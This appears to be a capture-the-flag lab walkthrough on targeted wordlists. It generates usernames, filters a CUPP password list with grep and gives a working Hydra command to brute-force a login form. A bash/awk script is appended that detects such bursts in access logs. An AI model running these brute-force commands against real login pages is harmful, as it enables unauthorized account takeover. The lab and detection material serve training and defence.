Custom Wordlists

After successfully brute-forcing, and then logging into the target, what is the full flag you find?

Getting the flag:

Step 1 - Generate usernames:

  • ./username-anarchy Jane Smith > jane_smith_usernames.txt

Step 2 - Use CUPP to create a personalized password list:

Step 3 - Filter the password list to match the following policy:

  • Minimum Length: 6 characters

  • Must Include:

    • At least one uppercase letter

    • At least one lowercase letter

    • At least one number

    • At least two special characters (from the set !@#$%^&*)

  • grep -E '^.{6,}$' jane.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' | grep -E '([!@#$%^&*].*){2,}' > jane-filtered.txt

Step 4 - Brute-force the login form with Hydra:

  • hydra -L jane_smith_usernames.txt -P jane-filtered.txt SERVER_IP -s SERVERPORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"

Step 5 - Login with the credentials and get the flag:

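On the defending side, the Hydra run in Step 4 appears in the web server's access log as a burst of POSTs to `/` from one client. The script below is an added example, not part of the original walkthrough, that flags such bursts and reports whether a success followed the failures. It assumes a combined-format access log, a 200 response for the "Invalid credentials" page and a 302 on successful login; the function names and sample log lines are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example, not from the original page. Assumptions: combined-format
# access log; a failed login returns 200 (the "Invalid credentials" page)
# and a successful login returns 302.

# Constructed sample log (all addresses are documentation ranges).
sample_log() {
  cat <<'EOF'
192.0.2.10 - - [10/Mar/2025:14:02:01 +0000] "GET / HTTP/1.1" 200 1490 "-" "-"
192.0.2.10 - - [10/Mar/2025:14:02:09 +0000] "POST / HTTP/1.1" 200 1532 "-" "-"
192.0.2.10 - - [10/Mar/2025:14:02:20 +0000] "POST / HTTP/1.1" 302 0 "-" "-"
203.0.113.7 - - [10/Mar/2025:14:02:30 +0000] "POST / HTTP/1.1" 200 1532 "-" "-"
203.0.113.7 - - [10/Mar/2025:14:02:31 +0000] "POST / HTTP/1.1" 200 1532 "-" "-"
203.0.113.7 - - [10/Mar/2025:14:02:32 +0000] "POST / HTTP/1.1" 200 1532 "-" "-"
203.0.113.7 - - [10/Mar/2025:14:02:33 +0000] "POST / HTTP/1.1" 200 1532 "-" "-"
203.0.113.7 - - [10/Mar/2025:14:02:34 +0000] "POST / HTTP/1.1" 302 0 "-" "-"
198.51.100.23 - - [10/Mar/2025:14:05:01 +0000] "POST / HTTP/1.1" 200 1532 "-" "-"
198.51.100.23 - - [10/Mar/2025:14:05:02 +0000] "POST / HTTP/1.1" 200 1532 "-" "-"
198.51.100.23 - - [10/Mar/2025:14:05:03 +0000] "POST / HTTP/1.1" 200 1532 "-" "-"
198.51.100.23 - - [10/Mar/2025:14:05:04 +0000] "POST / HTTP/1.1" 200 1532 "-" "-"
EOF
}

# detect_bruteforce THRESHOLD < access.log
# Flags clients with at least THRESHOLD POSTs to "/" inside one minute.
detect_bruteforce() {
  awk -v threshold="$1" '
    $6 == "\"POST" && $7 == "/" {
      ip = $1
      minute = substr($4, 2, 17)             # dd/Mon/yyyy:hh:mm
      n = ++burst[ip SUBSEP minute]          # requests by this IP in this minute
      if (n > peak[ip]) peak[ip] = n         # busiest minute seen for this IP
      total[ip]++
      if ($9 == 200) failed[ip]++
      if ($9 == 302 && failed[ip] > 0) hit[ip] = "yes"   # success after failures
    }
    END {
      for (ip in peak)
        if (peak[ip] >= threshold)
          printf "%s attempts=%d success_after_failures=%s\n",
                 ip, total[ip], ((ip in hit) ? "yes" : "no")
    }' | sort
}

sample_log | detect_bruteforce 4
```

A client reported with `success_after_failures=yes` is the case to triage first, since it indicates a guessed credential rather than just noise.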